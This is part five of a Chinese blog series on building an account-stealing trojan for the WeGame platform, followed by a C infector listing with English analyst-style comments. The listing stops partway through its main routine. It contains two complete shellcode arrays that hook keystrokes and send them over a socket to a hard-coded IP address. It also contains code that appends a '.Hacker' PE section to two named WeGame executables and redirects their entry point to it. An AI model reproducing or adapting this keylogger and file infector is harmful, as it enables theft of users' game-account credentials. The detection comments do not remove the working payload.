盗号木马之旅(五)

目标:

      实现把我们在 WeGame盗号木马之旅(三) 中实现的机器码注入到目标EXE中,并修改相关的PE结构,即完成InfectiveVirus.exe。

 

实现:

      下面上一张图,形象的解释我们怎么感染目标EXE:

      首先我们打开目标EXE,CreateFile,读到内存。

 然后在内存修改相关PE结构参数和注入代码:

最后写回覆盖原来的EXE即可:

 打开和写回很简单,就是一般的文件操作而已。关键在于怎么修改PE结构。具体细节请读者参考这几篇文章(http://www.cnblogs.com/wumac/p/5272846.html)(https://www.cnblogs.com/wumac/p/5274559.html)。读者需要有相关PE结构知识才行。下面简单说明一下我们需要改什么:

      一、新建一个节,我把他取名.Hacker,同时设置一下里面的一些数据

      二、修改PE头中节的数量

      三、修改ImageSize大小,即PE文件加到内存以后的大小

      四、修改入口点地址

      五、在文件尾部开辟0x2000大小的空间,存放机器码和参数

 

下面上代码:

#define WIN32_LEAN_AND_MEAN
#include<windows.h>
#include<tchar.h>
#include<stdio.h>
#include<Winsock2.h>

#pragma comment(lib,"WS2_32.lib")

/*
 * Globals that main copies into the RemoteParameter blob appended to each
 * target.  The trailing hex comment on each line is the item's byte offset
 * inside that blob: the string slots are 0x30 (48) bytes apart and the
 * int/HANDLE/DWORD/PROC slots after them are 4 bytes apart, which matches
 * the struct RemoteParameter layout (c[18][48], p[22], cc[3][48], pp[3]).
 * Only the string pointers and arrays are read in this listing (the memcpy
 * calls in main); the remaining globals are not referenced here and serve to
 * document the slot assignment the injected code expects.  String literals
 * are bound to non-const char*, which a C++ compiler rejects or warns about,
 * and NULL (a pointer constant) is assigned to DWORD variables below.
 */
char cBuffer[48] = { 0 };//0  (slot c[0], left empty)
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240  (IPv4 literal, page-specific; presumably the receiver address the post mentions -- not verifiable from this listing)
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
//-- 4-byte slots (p[22] in RemoteParameter); none of these is read or written by this program --
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//-- second group: device link name, two more API names and their slots (cc[] / pp[] in RemoteParameter) --
WCHAR pLinkName[] = L"\\\\.\\TROJAN_LINK";//3B8  (UTF-16; 32 bytes including the terminator, copied with sizeof)
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450


// Machine code injected into tgp_daemon.exe: the raw bytes as given in the
// post, which main copies to the start of the appended section.  They are
// deliberately not disassembled or annotated in this review.  Together with
// the ".Hacker" section name, these bytes are a usable static signature for
// an infected binary.  The array is declared `char` although many values
// exceed 127: an implementation-defined conversion in C, and a C++ compiler
// rejects the narrowing in a braced initializer.
char shellcode[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x57,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x57,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x57,
	0x00,0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x57,0x00,
	0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x57,0x00,0x8B,
	0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x57,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x57,0x00,0x8B,0x35,0x68,0x13,
	0x57,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x57,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x57,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x57,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x57,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x57,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x57,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x57,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x57,0x00,0x8B,0x05,0x80,
	0x13,0x57,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x57,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x57,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x57,0x00,0x8B,0x1D,0x80,0x13,0x57,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x57,0x00,0x8B,0x1D,0x84,0x13,0x57,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x57,0x00,0x68,0x30,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,0x57,
	0x00,0x89,0x05,0x6C,0x13,0x57,0x00,0x68,0x60,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,
	0x57,0x00,0x89,0x05,0x70,0x13,0x57,0x00,0x68,0xF0,0x10,0x57,0x00,0xFF,0x35,0x68,
	0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x88,0x13,0x57,0x00,0x68,
	0x20,0x11,0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,
	0x89,0x05,0x8C,0x13,0x57,0x00,0x68,0x50,0x11,0x57,0x00,0xFF,0x35,0x68,0x13,0x57,
	0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x90,0x13,0x57,0x00,0x68,0x80,0x11,
	0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,
	0x94,0x13,0x57,0x00,0x68,0xB0,0x11,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,
	0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x98,0x13,0x57,0x00,0x68,0xE0,0x11,0x57,0x00,
	0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x9C,0x13,
	0x57,0x00,0x68,0x10,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,
	0x13,0x57,0x00,0x89,0x05,0xA0,0x13,0x57,0x00,0x68,0x70,0x12,0x57,0x00,0xFF,0x35,
	0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xA4,0x13,0x57,0x00,
	0x68,0xA0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,
	0x00,0x89,0x05,0xA8,0x13,0x57,0x00,0x68,0xD0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,
	0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xAC,0x13,0x57,0x00,0x68,0x00,
	0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,
	0x05,0xB0,0x13,0x57,0x00,0x68,0x30,0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,
	0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xB4,0x13,0x57,0x00,0xFF,0x15,0x88,0x13,
	0x57,0x00,0x50,0x6A,0x00,0x68,0x00,0x03,0x57,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,
	0x57,0x00,0xE9,0x21,0xAA,0xF0,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x57,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x57,
	0x00,0x50,0x68,0xC0,0x03,0x57,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x57,
	0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,0x13,0x57,0x00,
	0xFF,0x15,0x94,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x0C,0x00,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x57,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x57,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0A,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x57,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x57,0x00,0xFF,0x15,0xA4,0x13,0x57,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x57,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x57,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x57,
	0x00,0xFF,0x15,0xB4,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00
};
// Machine code injected into TASLogin.exe: the raw bytes as given in the
// post, which main copies to the start of the appended section.  They are
// deliberately not disassembled or annotated in this review.  Together with
// the ".Hacker" section name, these bytes are a usable static signature for
// an infected binary.  The array is declared `char` although many values
// exceed 127: an implementation-defined conversion in C, and a C++ compiler
// rejects the narrowing in a braced initializer.
char shellcode2[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
	0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
	0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
	0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
	0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
	0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
	0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
	0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
	0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
	0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
	0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
	0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
	0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
	0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
	0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
	0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
	0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
	0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
	0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
	0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
	0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
	0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
	0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
	0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
	0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
	0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
	0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
	0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
	0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
	0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
	0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
	0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
	0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
	0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
	0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
	0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
	0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
	0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
	0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
	0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
	0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
	0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};


/*
 * Parameter blob that main writes 0x1000 bytes into the appended section.
 * Its layout matches the hex offset comments on the globals above: 18 string
 * slots of 0x30 bytes (0x000-0x35F), 22 DWORD slots (0x360-0x3B7), 3 more
 * string slots (0x3B8-0x447) and 3 DWORD slots (0x448-0x453); 0x454 (1108)
 * bytes in all, with no padding since every member is 4-byte aligned.
 * Declared with `typedef` but without a new type name, so it is only usable
 * as `struct RemoteParameter` (which is how main declares it); compilers
 * warn about the pointless typedef.
 */
typedef struct RemoteParameter
{
	char c[18][48];   // string slots: c[0] unused (cBuffer), c[1..17] the DLL paths, API names and IP literal
	DWORD p[22];      // 4-byte slots; left zero by this program (presumably filled in by the injected code -- not verifiable here)
	char cc[3][48];   // device link name (UTF-16), "CreateFileW", "DeviceIoControl"
	DWORD pp[3];      // two further 4-byte slots plus `temp`; also left zero here
};

/*
 * Entry point of the infector the post describes.  For each of the two
 * hard-coded WeGame binaries it reads the file into memory, appends a new PE
 * section named ".Hacker", redirects AddressOfEntryPoint to that section and
 * writes the modified image back over the original file in place.  The code
 * is left byte-identical; the comments are written from an analysis and
 * detection standpoint.
 *
 * File-level artifacts this routine leaves behind (all visible below):
 *   - one extra, last section named ".Hacker" with Characteristics
 *     0xF000000F: IMAGE_SCN_MEM_SHARED|MEM_EXECUTE|MEM_READ|MEM_WRITE in the
 *     high nibble (an RWX section) plus the normally reserved low nibble;
 *   - AddressOfEntryPoint equal to the previous SizeOfImage, i.e. pointing
 *     into that last section;
 *   - OptionalHeader.DllCharacteristics set to 0, which drops every flag
 *     (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, NX_COMPAT, ...);
 *   - the file grows by exactly 0x2000 bytes, and if the target carried an
 *     Authenticode signature it no longer verifies.
 *
 * Robustness: the input PE is not validated (no MZ/PE signature check, no
 * check that SizeOfHeaders has room for another IMAGE_SECTION_HEADER, no
 * check that the last table entry's raw data ends at end-of-file).
 * `void main()` is non-standard, and each `return` inside the loop ends the
 * whole program at the first failure, leaving any remaining target untouched.
 */
void main() {
	TCHAR* fileName[2];
	fileName[0] = _T("F:\\WeGame\\tgp_daemon.exe");//two hard-coded targets, each rewritten in place below
	fileName[1] = _T("F:\\WeGame\\tenprotect\\TASLogin.exe");
	//fileName[0] = _T("C:\\Users\\a\\Desktop\\WeGame\\tgp_daemon.exe");
	//fileName[1] = _T("C:\\Users\\a\\Desktop\\WeGame\\tenprotect\\TASLogin.exe");
	for (int i = 0; i < 2; i++) {
		DWORD dwApplySize = 0x2000;//size of the code + parameter area to append
		// Opened read/write with no backup copy.  The NULL passed as
		// dwFlagsAndAttributes is a pointer constant where a DWORD (0) is expected.
		HANDLE hFile = CreateFile(fileName[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, 0);
		if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
			printf("无法打开文件!");
			return;
		}
		DWORD dwFileSize = GetFileSize(hFile, NULL);
		if (dwFileSize == 0xffffffff) {
			printf("读取文件大小失败!");
			CloseHandle(hFile);
			return;
		}
		LPVOID pFileMem = GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, dwFileSize + dwApplySize);//zero-filled buffer: the whole file plus the new section
		if (pFileMem == NULL) {
			printf("开辟内存失败!");
			CloseHandle(hFile);
			return;
		}
		DWORD dwReadFactSize = 0;
		BOOL bRead = ReadFile(hFile, pFileMem, dwFileSize, &dwReadFactSize, NULL);
		if (!bRead || dwReadFactSize != dwFileSize) {
			printf("文件载入内存出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		//set up the new section
		// Walk to the NT headers via e_lfanew and to the section table just past
		// the optional header.  Neither the "MZ" nor the "PE\0\0" signature is
		// checked and e_lfanew is not bounds-checked against dwFileSize.
		PIMAGE_NT_HEADERS pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pFileMem + ((PIMAGE_DOS_HEADER)pFileMem)->e_lfanew);
		PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);
		int iSectionNum = pPeHeader->FileHeader.NumberOfSections;//original section count
		IMAGE_SECTION_HEADER addSectionHeader;//the new section header; stack-allocated and not zeroed (NumberOfLinenumbers is never assigned below)
		addSectionHeader.Name[0] = '.';
		addSectionHeader.Name[1] = 'H';
		addSectionHeader.Name[2] = 'a';
		addSectionHeader.Name[3] = 'c';
		addSectionHeader.Name[4] = 'k';
		addSectionHeader.Name[5] = 'e';
		addSectionHeader.Name[6] = 'r';
		addSectionHeader.Name[7] = '\0';//section name ".Hacker" (the 8-byte Name field, fully used)
		addSectionHeader.Misc.VirtualSize = dwApplySize;//virtual size of the section
